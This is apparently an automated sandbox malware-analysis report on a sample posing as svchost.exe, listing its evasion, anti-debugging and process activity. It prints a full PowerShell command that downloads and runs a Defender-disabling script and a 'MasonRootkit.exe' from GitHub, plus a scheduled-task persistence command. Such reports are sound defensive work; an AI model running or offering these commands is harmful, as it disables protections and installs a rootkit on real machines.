                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: svchost.exe.bin.exe, svchost.exe.bin.exe.0.drBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeMemory allocated: 1AD40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeWindow / User API: threadDelayed 6520Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeWindow / User API: threadDelayed 3296Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4450Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5368Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exe TID: 4036Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exe TID: 4036Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exe TID: 1072Thread sleep count: 6520 > 30Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exe TID: 1072Thread sleep count: 3296 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe TID: 3240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: svchost.exe.bin.exe.0.drBinary or memory string: vmware
                Source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}cM
                Source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
                Source: svchost.exe.bin.exe, 00000000.00000002.2416621621.000000001BC90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                Source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000003.00000002.2291436459.000002A7F8CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:+
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC406981 CheckRemoteDebuggerPresent,0_2_00007FFABC406981
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_2876.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: svchost.exe.bin.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2876, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe.bin.exe PID: 7352, type: MEMORYSTR
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -command "$settings = '{\"wd\": false, \"adminrun\": false}' | convertfrom-json; $randomstring = \"2pewmobxxq\"; if ($settings.wd) { $settings.adminrun = $true; (new-object system.net.webclient).downloadfile(\"https://raw.githubusercontent.com/ninhpn1337/disable-windows-defender/main/source.bat\", $env:temp + '\' + $randomstring + '.bat'); start-process -filepath ($env:temp + '\' + $randomstring + '.bat') -windowstyle hidden -wait -verb runas; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/r/raw/refs/heads/main/masonrootkit.exe\"; $outputpath = $env:temp + '\' + 'masonrootkit.exe'; (new-object system.net.webclient).downloadfile($url, $outputpath); start-process $outputpath -verb runas; } else { $url = \"https://github.com/charlie-60/r/raw/refs/heads/main/masonrootkit.exe\"; $outputpath = $env:temp + '\' + 'masonrootkit.exe'; (new-object system.net.webclient).downloadfile($url, $outputpath); start-process $outputpath; }"
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -command "$settings = '{\"wd\": false, \"adminrun\": false}' | convertfrom-json; $randomstring = \"2pewmobxxq\"; if ($settings.wd) { $settings.adminrun = $true; (new-object system.net.webclient).downloadfile(\"https://raw.githubusercontent.com/ninhpn1337/disable-windows-defender/main/source.bat\", $env:temp + '\' + $randomstring + '.bat'); start-process -filepath ($env:temp + '\' + $randomstring + '.bat') -windowstyle hidden -wait -verb runas; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/r/raw/refs/heads/main/masonrootkit.exe\"; $outputpath = $env:temp + '\' + 'masonrootkit.exe'; (new-object system.net.webclient).downloadfile($url, $outputpath); start-process $outputpath -verb runas; } else { $url = \"https://github.com/charlie-60/r/raw/refs/heads/main/masonrootkit.exe\"; $outputpath = $env:temp + '\' + 'masonrootkit.exe'; (new-object system.net.webclient).downloadfile($url, $outputpath); start-process $outputpath; }"Jump to behavior
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeQueries volume information: C:\Users\user\Desktop\svchost.exe.bin.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
